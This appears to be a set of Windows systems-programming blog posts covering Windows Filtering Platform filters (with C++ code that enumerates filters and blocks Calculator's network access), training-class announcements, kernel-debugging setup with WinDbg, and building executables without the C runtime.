In user-mode, the WFP manager is the Base Filtering Engine (BFE), which is a service implemented by bfe.dll and hosted in a standard svchost.exe instance. It implements the WFP user-mode API, essentially managing the platform, talking to its kernel counterpart when needed. We’ll examine some of these APIs in the next section.

User-mode applications, services and other components can utilize this user-mode management API to examine WFP objects state, and make changes, such as adding or deleting filters. A classic example of such “user” is the Windows Firewall, which is normally controllable by leveraging the Microsoft Management Console (MMC) that is provided for this purpose, but using these APIs from other applications is just as effective.

The kernel-mode filter engine exposes various logical layers, where filters (and callouts) can be attached. Layers represent locations in the network processing of one or more packets. The TCP/IP driver makes calls to the WFP kernel engine so that it can decide which filters (if any) should be “invoked”.

For filters, this means checking the conditions set by the filter against the current request. If the conditions are satisfied, the filter’s action is applied. Common actions include blocking a request from being further processed, allowing the request to continue without further processing in this layer, continuing to the next filter in this layer (if any), and invoking a callout driver. Callouts can perform any kind of processing, such as examining and even modifying packet data.
The relationship between layers, filters, and callouts is shown here:

As you can see the diagram, each layer can have zero or more filters, and zero or more callouts. The number and meaning of the layers is fixed and provided out of the box by Windows. On most system, there are about 100 layers. Many of the layers are sets of pairs, where one is for IPv4 and the other (identical in purpose) is for IPv6.

The WFP Explorer tool I created provides some insight into what makes up WFP. Running the tool and selecting View/Layers from the menu (or clicking the Layers tool bar button) shows a view of all existing layers.

You can download the WFP Explorer tool from its Github repository
(https://github.com/zodiacon/WFPExplorer) or the AllTools repository
(https://github.com/zodiacon/AllTools).

Each layer is uniquely identified by a GUID. Its Layer ID is used internally by the kernel engine as an identifier rather than the GUID, as it’s smaller and so is faster (layer IDs are 16-bit only). Most layers have fields that can be used by filters to set conditions for invoking their actions. Double-clicking a layer shows its properties. The next figure shows the general properties of an example layer. Notice it has 382 filters and 2 callouts attached to it.

Clicking the Fields tab shows the fields available in this layer, that can be used by filters to set conditions.

The meaning of the various layers, and the meaning of the fields for the layers are all documented in the official WFP documentation.

The currently existing filters can be viewed in WFP Explorer by selecting Filters from the View menu. Layers cannot be added or removed, but filters can. Management code (user or kernel) can add and/or remove filters dynamically while the system is running. You can see that on the system the tool is running on there are currently 2978 filters.

Each filter is uniquely identified by a GUID, and just like layers has a “shorter” id (64-bit) that is used by the kernel engine to more quickly compare filter IDs when needed. Since multiple filters can be assigned to the same layer, some kind of ordering must be used when assessing filters. This is where the filter’s weight comes into play. A weight is a 64-bit value that is used to sort filters by priority. As you can see in figure 13-7, there are two weight properties – weight and effective weight. Weight is what is specified when adding the filter, but effective weight is the actual one used. There are three possible values to set for weight:

  • A value between 0 and 15 is interpreted by WFP as a weight index, which simply means that the effective weight is going to start with 4 bits having the specified weight value and generate the other 60 bit. For example, if the weight is set to 5, then the effective weight is going to be between 0x5000000000000000 and 0x5FFFFFFFFFFFFFFF.
  • An empty value tells WFP to generate an effective weight somewhere in the 64-bit range.
  • A value above 15 is taken as is to become the effective weight.

What is an “empty” value? The weight is not really a number, but a FWP_VALUE type can hold all sorts of values, including holding no value at all (empty).

Double-clicking a filter in WFP Explorer shows its general properties:

The Conditions tab shows the conditions this filter is configured with. When all the conditions are met, the action of the filter is going to fire.

The list of fields used by a filter must be a subset of the fields exposed by the layer this filter is attached to. There are six conditions shown in figure 13-9 out of the possible 39 fields supported by this layer (“ALE Receive/Accept v4 Layer”). As you can see, there is a lot of flexibility in specifying conditions for fields – this is evident in the matching enumeration, FWPM_MATCH_TYPE:

typedef enum FWP_MATCH_TYPE_ {
    FWP_MATCH_EQUAL    = 0,
    FWP_MATCH_GREATER,
    FWP_MATCH_LESS,
    FWP_MATCH_GREATER_OR_EQUAL,
    FWP_MATCH_LESS_OR_EQUAL,
    FWP_MATCH_RANGE,
    FWP_MATCH_FLAGS_ALL_SET,
    FWP_MATCH_FLAGS_ANY_SET,
    FWP_MATCH_FLAGS_NONE_SET,
    FWP_MATCH_EQUAL_CASE_INSENSITIVE,
    FWP_MATCH_NOT_EQUAL,
    FWP_MATCH_PREFIX,
    FWP_MATCH_NOT_PREFIX,
    FWP_MATCH_TYPE_MAX
} FWP_MATCH_TYPE;

The WFP API exposes its functionality for user-mode and kernel-mode callers. The header files used are different, to cater for differences in API expectations between user-mode and kernel-mode, but APIs in general are identical. For example, kernel APIs return NTSTATUS, whereas user-mode APIs return a simple LONG, that is the error value that is returned normally from GetLastError. Some APIs are provided for kernel-mode only, as they don’t make sense for user mode.

W> The user-mode WFP APIs never set the last error, and always return the error value directly. Zero (ERROR_SUCCESS) means success, while other (positive) values mean failure. Do not call GetLastError when using WFP – just look at the returned value.

WFP functions and structures use a versioning scheme, where function and structure names end with a digit, indicating version. For example, FWPM_LAYER0 is the first version of a structure describing a layer. At the time of writing, this was the only structure for describing a layer. As a counter example, there are several versions of the function beginning with FwpmNetEventEnum: FwpmNetEventEnum0 (for Vista+), FwpmNetEventEnum1 (Windows 7+), FwpmNetEventEnum2 (Windows 8+), FwpmNetEventEnum3 (Windows 10+), FwpmNetEventEnum4 (Windows 10 RS4+), and FwpmNetEventEnum5 (Windows 10 RS5+). This is an extreme example, but there are others with less “versions”. You can use any version that matches the target platform. To make it easier to work with these APIs and structures, a macro is defined with the base name that is expanded to the maximum supported version based on the target compilation platform. Here is part of the declarations for the macro FwpmNetEventEnum:

DWORD FwpmNetEventEnum0(
   _In_ HANDLE engineHandle,
   _In_ HANDLE enumHandle,
   _In_ UINT32 numEntriesRequested,
   _Outptr_result_buffer_(*numEntriesReturned) FWPM_NET_EVENT0*** entries,
   _Out_ UINT32* numEntriesReturned);
#if (NTDDI_VERSION >= NTDDI_WIN7)
DWORD FwpmNetEventEnum1(
   _In_ HANDLE engineHandle,
   _In_ HANDLE enumHandle,
   _In_ UINT32 numEntriesRequested,
   _Outptr_result_buffer_(*numEntriesReturned) FWPM_NET_EVENT1*** entries,
   _Out_ UINT32* numEntriesReturned);
#endif // (NTDDI_VERSION >= NTDDI_WIN7)
#if (NTDDI_VERSION >= NTDDI_WIN8)
DWORD FwpmNetEventEnum2(
   _In_ HANDLE engineHandle,
   _In_ HANDLE enumHandle,
   _In_ UINT32 numEntriesRequested,
   _Outptr_result_buffer_(*numEntriesReturned) FWPM_NET_EVENT2*** entries,
   _Out_ UINT32* numEntriesReturned);
#endif // (NTDDI_VERSION >= NTDDI_WIN8)

You can see that the differences in the functions relate to the structures returned as part of these APIs (FWPM_NET_EVENTx). It’s recommended you use the macros, and only turn to specific versions if there is a compelling reason to do so.

The WFP APIs adhere to strict naming conventions that make it easier to use. All management functions start with Fwpm (Filtering Windows Platform Management), and all management structures start with FWPM. The function names themselves use the pattern <prefix><object type><operation>, such as FwpmFilterAdd and FwpmLayerGetByKey.

It’s curious that the prefixes used for functions, structures, and enums start with FWP rather than the (perhaps) expected WFP. I couldn’t find a compelling reason for this.

WFP header files start with fwp and end with u for user-mode or k for kernel-mode. For example, fwpmu.h holds the management functions for user-mode callers, whereas fwpmk.h is the header for kernel callers. Two common files, fwptypes.h and fwpmtypes.h are used by both user-mode and kernel-mode headers. They are included by the “main” header files.

User-Mode Examples

Before making any calls to specific APIs, a handle to the WFP engine must be opened with FwpmEngineOpen:

DWORD FwpmEngineOpen0(
   _In_opt_ const wchar_t* serverName,  // must be NULL
   _In_ UINT32 authnService,            // RPC_C_AUTHN_DEFAULT
   _In_opt_ SEC_WINNT_AUTH_IDENTITY_W* authIdentity,
   _In_opt_ const FWPM_SESSION0* session,
   _Out_ HANDLE* engineHandle);

Most of the arguments have good defaults when NULL is specified. The returned handle must be used with subsequent APIs. Once it’s no longer needed, it must be closed:

DWORD FwpmEngineClose0(_Inout_ HANDLE engineHandle);

Enumerating Objects

What can we do with an engine handle? One thing provided with the management API is enumeration. These are the APIs used by WFP Explorer to enumerate layers, filters, sessions, and other object types in WFP. The following example displays some details for all the filters in the system (error handling omitted for brevity, the project wfpfilters has the full source code):

#include <Windows.h>
#include <fwpmu.h>
#include <stdio.h>
#include <string>

#pragma comment(lib, "Fwpuclnt")

std::wstring GuidToString(GUID const& guid) {
    WCHAR sguid[64];
    return ::StringFromGUID2(guid, sguid, _countof(sguid)) ? sguid : L"";
}

const char* ActionToString(FWPM_ACTION const& action) {
    switch (action.type) {
        case FWP_ACTION_BLOCK:               return "Block";
        case FWP_ACTION_PERMIT:              return "Permit";
        case FWP_ACTION_CALLOUT_TERMINATING: return "Callout Terminating";
        case FWP_ACTION_CALLOUT_INSPECTION:  return "Callout Inspection";
        case FWP_ACTION_CALLOUT_UNKNOWN:     return "Callout Unknown";
        case FWP_ACTION_CONTINUE:            return "Continue";
        case FWP_ACTION_NONE:                return "None";
        case FWP_ACTION_NONE_NO_MATCH:       return "None (No Match)";
    }
    return "";
}

int main() {
    //
    // open a handle to the WFP engine
    //
    HANDLE hEngine;
    FwpmEngineOpen(nullptr, RPC_C_AUTHN_DEFAULT, nullptr, nullptr, &hEngine);

    //
    // create an enumeration handle
    //
    HANDLE hEnum;
    FwpmFilterCreateEnumHandle(hEngine, nullptr, &hEnum);

    UINT32 count;
    FWPM_FILTER** filters;
    //
    // enumerate filters
    //
    FwpmFilterEnum(hEngine, hEnum, 
        8192,       // maximum entries, 
        &filters,   // returned result
        &count);    // how many actually returned

    for (UINT32 i = 0; i < count; i++) {
        auto f = filters[i];
        printf("%ws Name: %-40ws Id: 0x%016llX Conditions: %2u Action: %s\n",
            GuidToString(f->filterKey).c_str(),
            f->displayData.name,
            f->filterId,
            f->numFilterConditions,
            ActionToString(f->action));
    }
    //
    // free memory allocated by FwpmFilterEnum
    //
    FwpmFreeMemory((void**)&filters);

    //
    // close enumeration handle
    //
    FwpmFilterDestroyEnumHandle(hEngine, hEnum);

    //
    // close engine handle
    //
    FwpmEngineClose(hEngine);

    return 0;
}

The enumeration pattern repeat itself with all other WFP object types (layers, callouts, sessions, etc.).

Adding Filters

Let’s see if we can add a filter to perform some useful function. Suppose we want to prevent network access from some process. We can add a filter at an appropriate layer to make it happen. Adding a filter is a matter of calling FwpmFilterAdd:

DWORD FwpmFilterAdd0(
   _In_ HANDLE engineHandle,
   _In_ const FWPM_FILTER0* filter,
   _In_opt_ PSECURITY_DESCRIPTOR sd,
   _Out_opt_ UINT64* id);

The main work is to fill a FWPM_FILTER structure defined like so:

typedef struct FWPM_FILTER0_ {
    GUID filterKey;
    FWPM_DISPLAY_DATA0 displayData;
    UINT32 flags;
    /* [unique] */ GUID *providerKey;
    FWP_BYTE_BLOB providerData;
    GUID layerKey;
    GUID subLayerKey;
    FWP_VALUE0 weight;
    UINT32 numFilterConditions;
    /* [unique][size_is] */ FWPM_FILTER_CONDITION0 *filterCondition;
    FWPM_ACTION0 action;
    /* [switch_is] */ /* [switch_type] */ union 
        {
        /* [case()] */ UINT64 rawContext;
        /* [case()] */ GUID providerContextKey;
        }     ;
    /* [unique] */ GUID *reserved;
    UINT64 filterId;
    FWP_VALUE0 effectiveWeight;
} FWPM_FILTER0;

The weird-looking comments are generated by the Microsoft Interface Definition Language (MIDL) compiler when generating the header file from an IDL file. Although IDL is most commonly used by Component Object Model (COM) to define interfaces and types, WFP uses IDL to define its APIs, even though no COM interfaces are used; just plain C functions. The original IDL files are provided with the SDK, and they are worth checking out, since they may contain developer comments that are not “transferred” to the resulting header files.

Some members in FWPM_FILTER are necessary – layerKey to indicate the layer to attach this filter, any conditions needed to trigger the filter (numFilterConditions and the filterCondition array), and the action to take if the filter is triggered (action field).

Let’s create some code that prevents the Windows Calculator from accessing the network. You may be wondering why would calculator require network access? No, it’s not contacting Google to ask for the result of 2+2. It’s using the Internet for accessing current exchange rates.

Clicking the Update Rates button causes Calculator to consult the Internet for the updated exchange rate. We’ll add a filter that prevents this.

We’ll start as usual by opening handle to the WFP engine as was done in the previous example. Next, we need to fill the FWPM_FILTER structure. First, a nice display name:

FWPM_FILTER filter{};   // zero out the structure
WCHAR filterName[] = L"Prevent Calculator from accessing the web";
filter.displayData.name = filterName;

The name has no functional part – it just allows easy identification when enumerating filters. Now we need to select the layer. We’ll also specify the action:

filter.layerKey = FWPM_LAYER_ALE_AUTH_CONNECT_V4;
filter.action.type = FWP_ACTION_BLOCK;

There are several layers that could be used for blocking access, with the above layer being good enough to get the job done. Full description of the provided layers, their purpose and when they are used is provided as part of the WFP documentation.

The last part to initialize is the conditions to use. Without conditions, the filter is always going to be invoked, which will block all network access (or just for some processes, based on its effective weight). In our case, we only care about the application – we don’t care about ports or protocols. The layer we selected has several fields, one of with is called ALE App ID (ALE stands for Application Layer Enforcement).

This field can be used to identify an executable. To get that ID, we can use FwpmGetAppIdFromFileName. Here is the code for Calculator’s executable:

WCHAR filename[] = LR"(C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_11.2210.0.0_x64__8wekyb3d8bbwe\CalculatorApp.exe)";
FWP_BYTE_BLOB* appId;
FwpmGetAppIdFromFileName(filename, &appId);

The code uses the path to the Calculator executable on my system – you should change that as needed because Calculator’s version might be different. A quick way to get the executable path is to run Calculator, open Process Explorer, open the resulting process properties, and copy the path from the Image tab.

The R"( and closing parenthesis in the above snippet disable the “escaping” property of backslashes, making it easier to write file paths (C++ 14 feature).

The return value from FwpmGetAppIdFromFileName is a BLOB that needs to be freed eventually with FwpmFreeMemory.

Now we’re ready to specify the one and only condition:

FWPM_FILTER_CONDITION cond;
cond.fieldKey = FWPM_CONDITION_ALE_APP_ID;      // field
cond.matchType = FWP_MATCH_EQUAL;
cond.conditionValue.type = FWP_BYTE_BLOB_TYPE;
cond.conditionValue.byteBlob = appId;

filter.filterCondition = &cond;
filter.numFilterConditions = 1;

The conditionValue member of FWPM_FILTER_CONDITION is a FWP_VALUE, which is a generic way to specify many types of values. It has a type member that indicates the member in a big union that should be used. In our case, the type is a BLOB (FWP_BYTE_BLOB_TYPE) and the actual value should be passed in the byteBlob union member.

The last step is to add the filter, and repeat the exercise for IPv6, as we don’t know how Calculator connects to the currency exchange server (we can find out, but it would be simpler and more robust to just block IPv6 as well):

FwpmFilterAdd(hEngine, &filter, nullptr, nullptr);

filter.layerKey = FWPM_LAYER_ALE_AUTH_CONNECT_V6;   // IPv6
FwpmFilterAdd(hEngine, &filter, nullptr, nullptr);

We didn’t specify any GUID for the filter. This causes WFP to generate a GUID. We didn’t specify weight, either. WFP will generate them.

All that’s left now is some cleanup:

FwpmFreeMemory((void**)&appId);
FwpmEngineClose(hEngine);

Running this code (elevated) should and trying to refresh the currency exchange rate with Calculator should fail. Note that there is no need to restart Calculator – the effect is immediate.

We can locate the filters added with WFP Explorer:

Double-clicking one of the filters and selecting the Conditions tab shows the only condition where the App ID is revealed to be the full path of the executable in device form. Of course, you should not take any dependency on this format, as it may change in the future.

You can right-click the filters and delete them using WFP Explorer. The FwpmFilterDeleteByKey API is used behind the scenes. This will restore Calculator’s exchange rate update functionality.

Upcoming Public Training Classes for April/May

16 February 2023 at 22:02

Today I’m happy to announce two training classes to take place in April and May. These classes will be in 4-hour session chunks, so that it’s easier to consume even for uncomfortable time zones.

The first is Advanced Windows Kernel Programming, a class I was promising for quite some time now… it will be held on the following dates:

  • April: 18, 20, 24, 27 and May: 1, 4, 8, 11 (4 days total)
  • Times: 11am to 3pm ET (8am-12pm PT, 4pm to 8pm UT/GMT)

The course will include advanced topics in Windows kernel development, and is recommended for those that were in my Windows Kernel Programming class or have equivalent knowledge; for example, by reading my book Windows Kernel Programming.

Example topics include: deep dive into Windows’ kernel design, working with APCs, Windows Filtering Platform callout drivers, advanced memory management techniques, plug & play filter drivers, and more!

The second class is Windows Internals to be held on the following dates:

  • May: 2, 3, 9, 10, 15, 18, 22, 24, 30 and June: 1, 5 (5.5 days)
  • Times: 11am to 3pm ET (8am-12pm PT, 4pm to 8pm UT/GMT)

The syllabus can be found here (some modifications possible, but the general outline remains).

Cost
950 USD (if paid by an individual), 1900 USD (if paid by a company). The cost is the same for these training classes. Previous students in my classes get 10% off.
Multiple participants from the same company get a discount as well (contact me for the details).

If you’d like to register, please send me an email to [email protected] with the name of the training in the email title, provide your full name, company (if any), preferred contact email, and your time zone.

The sessions will be recorded, so you can watch any part you may be missing, or that may be somewhat overwhelming in “real time”.

As usual, if you have any questions, feel free to send me an email, or DM on twitter (@zodiacon) or Linkedin (https://www.linkedin.com/in/pavely/).


Windows Kernel Programming Class Recordings

20 February 2023 at 13:33

I’ve recently posted about the upcoming training classes, the first of which is Advanced Windows Kernel Programming in April. Some people have asked me how can they participate if they have not taken the Windows Kernel Programming fundamentals class, and they might not have the required time to read the book.

Since I don’t plan on providing the fundamentals training class before April, after some thought, I decided to do the following.

I am selling one of the previous Windows Kernel Programming class recordings, along with the course PDF materials, the labs, and solutions to the labs. This is the first time I’m selling recordings of my public classes. If this “experiment” goes well, I might consider doing this with other classes as well. Having recordings is not the same as doing a live training class, but it’s the next best thing if the knowledge provided is valuable and useful. It’s about 32 hours of video, and plenty of labs to keep you busy 🙂

As an added bonus, I am also giving the following to those purchasing the training class:

  • You get 10% discount for the Advanced Windows Kernel Programming class in April.
  • You will be added to a discord server that will host all the Alumni from my public classes (an idea I was given by some of my students which will happen soon)
  • A live session with me sometime in early April (I’ll do a couple in different times of day so all time zones can find a comfortable session) where you can ask questions about the class, etc.

These are the modules covered in the class recordings:

  • Module 0: Introduction
  • Module 1: Windows Internals Overview
  • Module 2: The I/O System
  • Module 3: Device Driver Basics
  • Module 4: The I/O Request Packet
  • Module 5: Kernel Mechanisms
  • Module 6: Process and Thread Monitoring
  • Module 7: Object and Registry Notifications
  • Module 8: File System Mini-Filters Fundamentals
  • Module 9: Miscellaneous Techniques

If you’re interested in purchasing the class, send me an email to [email protected] with the title “Kernel Programming class recordings” and I will reply with payment details. Once paid, reply with the payment information, and I will share a link with the course. I’m working on splitting the recordings into meaningful chunks, so not all are ready yet, but these will be completed in the next day or so.

Here are the rules after a purchase:

  • No refunds – once you have access to the recordings, this is it.
  • No sharing – the content is for your own personal viewing. No sharing of any kind is allowed.
  • No reselling – I own the copyright and all rights.

The cost is 490 USD for the entire class. That’s the whole 32 hours.

If you’re part of a company (or simply have friends) that would like to purchase multiple “licenses”, contact me for a discount.

Levels of Kernel Debugging

7 March 2023 at 17:01

Doing any kind of research into the Windows kernel requires working with a kernel debugger, mostly WinDbg (or WinDbg Preview). There are at least 3 “levels” of debugging the kernel.

Level 1: Local Kernel Debugging

The first is using a local kernel debugger, which means configuring WinDbg to look at the kernel of the local machine. This can be configured by running the following command in an elevated command window, and restarting the system:

bcdedit -debug on

You must disable Secure Boot (if enabled) for this command to work, as Secure Boot protects against putting the machine in local kernel debugging mode. Once the system is restarted, WinDbg launched elevated, select File/Kernel Debug and go with the “Local” option (WinDbg Preview shown):

If all goes well, you’ll see the “lkd>” prompt appearing, confirming you’re in local kernel debugging mode.

What can you in this mode? You can look at anything in kernel and user space, such as listing the currently existing processes (!process 0 0), or examining any memory location in kernel or user space. You can even change kernel memory if you so desire, but be careful, any “bad” change may crash your system.

The downside of local kernel debugging is that the system is a moving target, things change while you’re typing commands, so you don’t want to look at things that change quickly. Additionally, you cannot set any breakpoint; you cannot view any CPU registers, since these are changing constantly, and are on a CPU-basis anyway.

The upside of local kernel debugging is convenience – setting it up is very easy, and you can still get a lot of information with this mode.

Level 2: Remote Debugging of a Virtual Machine

The next level is a full kernel debugging experience of a virtual machine, which can be running locally on your host machine, or perhaps on another host somewhere. Setting this up is more involved. First, the target VM must be set up to allow kernel debugging and set the “interface” to the host debugger. Windows supports several interfaces, but for a VM the best to use is network (supported on Windows 8 and later).

First, go to the VM and ping the host to find out its IP address. Then type the following:

bcdedit /dbgsettings net hostip:172.17.32.1 port:55000 key:1.2.3.4

Replace the host IP with the correct address, and select an unused port on the host. The key can be left out, in which case the command will generate something for you. Since that key is needed on the host side, it’s easier to select something simple. If the target VM is not local, you might prefer to let the command generate a random key and use that.

Next, launch WinDbg elevated on the host, and attach to the kernel using the “Net” option, specifying the correct port and key:

Restart the target, and it should connect early in its boot process:

Microsoft (R) Windows Debugger Version 10.0.25200.1003 AMD64
Copyright (c) Microsoft Corporation. All rights reserved.

Using NET for debugging
Opened WinSock 2.0
Waiting to reconnect...
Connected to target 172.29.184.23 on port 55000 on local IP 172.29.176.1.
You can get the target MAC address by running .kdtargetmac command.
Connected to Windows 10 25309 x64 target at (Tue Mar  7 11:38:18.626 2023 (UTC - 5:00)), ptr64 TRUE
Kernel Debugger connection established.  (Initial Breakpoint requested)

************* Path validation summary **************
Response                         Time (ms)     Location
Deferred                                       SRV*d:\Symbols*https://msdl.microsoft.com/download/symbols
Symbol search path is: SRV*d:\Symbols*https://msdl.microsoft.com/download/symbols
Executable search path is: 
Windows 10 Kernel Version 25309 MP (1 procs) Free x64
Edition build lab: 25309.1000.amd64fre.rs_prerelease.230224-1334
Machine Name:
Kernel base = 0xfffff801`38600000 PsLoadedModuleList = 0xfffff801`39413d70
System Uptime: 0 days 0:00:00.382
nt!DebugService2+0x5:
fffff801`38a18655 cc              int     3

Enter the g command to let the system continue. The prompt is “kd>” with the current CPU number on the left. You can break at any point into the target by clicking the “Break” toolbar button in the debugger. Then you can set up breakpoints, for whatever you’re researching. For example:

1: kd> bp nt!ntWriteFile
1: kd> g
Breakpoint 0 hit
nt!NtWriteFile:
fffff801`38dccf60 4c8bdc          mov     r11,rsp
2: kd> k
 # Child-SP          RetAddr               Call Site
00 fffffa03`baa17428 fffff801`38a81b05     nt!NtWriteFile
01 fffffa03`baa17430 00007ff9`1184f994     nt!KiSystemServiceCopyEnd+0x25
02 00000095`c2a7f668 00007ff9`0ec89268     0x00007ff9`1184f994
03 00000095`c2a7f670 0000024b`ffffffff     0x00007ff9`0ec89268
04 00000095`c2a7f678 00000095`c2a7f680     0x0000024b`ffffffff
05 00000095`c2a7f680 0000024b`00000001     0x00000095`c2a7f680
06 00000095`c2a7f688 00000000`000001a8     0x0000024b`00000001
07 00000095`c2a7f690 00000095`c2a7f738     0x1a8
08 00000095`c2a7f698 0000024b`af215dc0     0x00000095`c2a7f738
09 00000095`c2a7f6a0 0000024b`0000002c     0x0000024b`af215dc0
0a 00000095`c2a7f6a8 00000095`c2a7f700     0x0000024b`0000002c
0b 00000095`c2a7f6b0 00000000`00000000     0x00000095`c2a7f700
2: kd> .reload /user
Loading User Symbols
.....................
2: kd> k
 # Child-SP          RetAddr               Call Site
00 fffffa03`baa17428 fffff801`38a81b05     nt!NtWriteFile
01 fffffa03`baa17430 00007ff9`1184f994     nt!KiSystemServiceCopyEnd+0x25
02 00000095`c2a7f668 00007ff9`0ec89268     ntdll!NtWriteFile+0x14
03 00000095`c2a7f670 00007ff9`08458dda     KERNELBASE!WriteFile+0x108
04 00000095`c2a7f6e0 00007ff9`084591e6     icsvc!ICTransport::PerformIoOperation+0x13e
05 00000095`c2a7f7b0 00007ff9`08457848     icsvc!ICTransport::Write+0x26
06 00000095`c2a7f800 00007ff9`08452ea3     icsvc!ICEndpoint::MsgTransactRespond+0x1f8
07 00000095`c2a7f8b0 00007ff9`08452abc     icsvc!ICTimeSyncReferenceMsgHandler+0x3cb
08 00000095`c2a7faf0 00007ff9`084572cf     icsvc!ICTimeSyncMsgHandler+0x3c
09 00000095`c2a7fb20 00007ff9`08457044     icsvc!ICEndpoint::HandleMsg+0x11b
0a 00000095`c2a7fbb0 00007ff9`084574c1     icsvc!ICEndpoint::DispatchBuffer+0x174
0b 00000095`c2a7fc60 00007ff9`08457149     icsvc!ICEndpoint::MsgDispatch+0x91
0c 00000095`c2a7fcd0 00007ff9`0f0344eb     icsvc!ICEndpoint::DispatchThreadFunc+0x9
0d 00000095`c2a7fd00 00007ff9`0f54292d     ucrtbase!thread_start<unsigned int (__cdecl*)(void *),1>+0x3b
0e 00000095`c2a7fd30 00007ff9`117fef48     KERNEL32!BaseThreadInitThunk+0x1d
0f 00000095`c2a7fd60 00000000`00000000     ntdll!RtlUserThreadStart+0x28
2: kd> !process -1 0
PROCESS ffffc706a12df080
    SessionId: 0  Cid: 0828    Peb: 95c27a1000  ParentCid: 044c
    DirBase: 1c57f1000  ObjectTable: ffffa50dfb92c880  HandleCount: 123.
    Image: svchost.exe

In this “level” of debugging you have full control of the system. When in a breakpoint, nothing is moving. You can view register values, call stacks, etc., without anything changing “under your feet”. This seems perfect, so do we really need another level?

Some aspects of a typical kernel might not show up when debugging a VM. For example, looking at the list of interrupt service routines (ISRs) with the !idt command on my Hyper-V VM shows something like the following (truncated):

2: kd> !idt

Dumping IDT: ffffdd8179e5f000

00:	fffff80138a79800 nt!KiDivideErrorFault
01:	fffff80138a79b40 nt!KiDebugTrapOrFault	Stack = 0xFFFFDD8179E95000
02:	fffff80138a7a140 nt!KiNmiInterrupt	Stack = 0xFFFFDD8179E8D000
03:	fffff80138a7a6c0 nt!KiBreakpointTrap
...
2e:	fffff80138a80e40 nt!KiSystemService
2f:	fffff80138a75750 nt!KiDpcInterrupt
30:	fffff80138a733c0 nt!KiHvInterrupt
31:	fffff80138a73720 nt!KiVmbusInterrupt0
32:	fffff80138a73a80 nt!KiVmbusInterrupt1
33:	fffff80138a73de0 nt!KiVmbusInterrupt2
34:	fffff80138a74140 nt!KiVmbusInterrupt3
35:	fffff80138a71d88 nt!HalpInterruptCmciService (KINTERRUPT ffffc70697f23900)

36:	fffff80138a71d90 nt!HalpInterruptCmciService (KINTERRUPT ffffc70697f23a20)

b0:	fffff80138a72160 ACPI!ACPIInterruptServiceRoutine (KINTERRUPT ffffdd817a1ecdc0)
...

Some things are missing, such as the keyboard interrupt handler. This is due to certain things handled “internally” as the VM is “enlightened”, meaning it “knows” it’s a VM. Normally, it’s a good thing – you get nice support for copy/paste between the VM and the host, seamless mouse and keyboard interaction, etc. But it does mean it’s not the same as another physical machine.

Level 3: Remote debugging of a physical machine

In this final level, you’re debugging a physical machine, which provides the most “authentic” experience. Setting this up is the trickiest. Full description of how to set it up is described in the debugger documentation. In general, it’s similar to the previous case, but network debugging might not work for you depending on the network card type your target and host machines have.

If network debugging is not supported because of the limited list of network cards supported, your best bet is USB debugging using a dedicated USB cable that you must purchase. The instructions to set up USB debugging are provided in the docs, but it may require some trial and error to locate the USB ports that support debugging (not all do). Once you have that set up, you’ll use the “USB” tab in the kernel attachment dialog on the host. Once connected, you can set breakpoints in ISRs that may not exist on a VM:

: kd> !idt

Dumping IDT: fffff8022f5b1000

00:	fffff80233236100 nt!KiDivideErrorFault
...
80:	fffff8023322cd70 i8042prt!I8042KeyboardInterruptService (KINTERRUPT ffffd102109c0500)
...
Dumping Secondary IDT: ffffe5815fa0e000 

01b0:hidi2c!OnInterruptIsr (KMDF) (KINTERRUPT ffffd10212e6edc0)

0: kd> bp i8042prt!I8042KeyboardInterruptService
0: kd> g
Breakpoint 0 hit
i8042prt!I8042KeyboardInterruptService:
fffff802`6dd42100 4889542410      mov     qword ptr [rsp+10h],rdx
0: kd> k
 # Child-SP          RetAddr               Call Site
00 fffff802`2f5cdf48 fffff802`331453cb     i8042prt!I8042KeyboardInterruptService
01 fffff802`2f5cdf50 fffff802`3322b25f     nt!KiCallInterruptServiceRoutine+0x16b
02 fffff802`2f5cdf90 fffff802`3322b527     nt!KiInterruptSubDispatch+0x11f
03 fffff802`2f5be9f0 fffff802`3322e13a     nt!KiInterruptDispatch+0x37
04 fffff802`2f5beb80 00000000`00000000     nt!KiIdleLoop+0x5a

Happy debugging!

Minimal Executables

15 March 2023 at 23:17

Here is a simple experiment to try: open Visual Studio and create a C++ console application. All that app is doing is display “hello world” to the console:

#include <stdio.h>

int main() {
	printf("Hello, world!\n");
	return 0;
}

Build the executable in Release build and check its size. I get 11KB (x64). Not too bad, perhaps. However, if we check the dependencies of this executable (using the dumpbin command line tool or any PE Viewer), we’ll find the following in the Import directory:

There are two dependencies: Kernel32.dll and VCRuntime140.dll. This means these DLLs will load at process start time no matter what. If any of these DLLs is not found, the process will crash. We can’t get rid of Kernel32 easily, but we may be able to link statically to the CRT. Here is the required change to VS project properties:

After building, the resulting executable jumps to 136KB in size! Remember, it’s a “hello, world” application. The Imports directory in a PE viewer now show Kernel32.dll as the only dependency.

Is that best we can do? Why do we need the CRT in the first place? One obvious reason is the usage of the printf function, which is implemented by the CRT. Maybe we can use something else without depending on the CRT. There are other reasons the CRT is needed. Here are a few:

  • The CRT is the one calling our main function with the correct argc and argv. This is expected behavior by developers.
  • Any C++ global objects that have constructors are executed by the CRT before the main function is invoked.
  • Other expected behaviors are provided by the CRT, such as correct handling of the errno (global) variable, which is not really global, but uses Thread-Local-Storage behind the scenes to make it per-thread.
  • The CRT implements the new and delete C++ operators, without which much of the C++ standard library wouldn’t work without major customization.

Still, we may be OK doing things outside the CRT, taking care of ourselves. Let’s see if we can pull it off. Let’s tell the linker that we’re not interested in the CRT:

Setting “Ignore All Default Libraries” tells the linker we’re not interested in linking with the CRT in any way. Building the app now gives some linker errors:

1>Test2.obj : error LNK2001: unresolved external symbol __security_check_cookie
1>Test2.obj : error LNK2001: unresolved external symbol __imp___acrt_iob_func
1>Test2.obj : error LNK2001: unresolved external symbol __imp___stdio_common_vfprintf
1>LINK : error LNK2001: unresolved external symbol mainCRTStartup
1>D:\Dev\Minimal\x64\Release\Test2.exe : fatal error LNK1120: 4 unresolved externals

One thing we expected is the missing printf implementation. What about the other errors? We have the missing “security cookie” implementation, which is a feature of the CRT to try to detect stack overrun by placing a “cookie” – some number – before making certain function calls and making sure that cookie is still there after returning. We’ll have to settle without this feature. The main missing piece is mainCRTStartup, which is the default entry point that the linker is expecting. We can change the name, or overwrite main to have that name.

First, let’s try to fix the linker errors before reimplementing the printf functionality. We’ll remove the printf call and rebuild. Things are improving:

>Test2.obj : error LNK2001: unresolved external symbol __security_check_cookie
1>LINK : error LNK2001: unresolved external symbol mainCRTStartup
1>D:\Dev\Minimal\x64\Release\Test2.exe : fatal error LNK1120: 2 unresolved externals

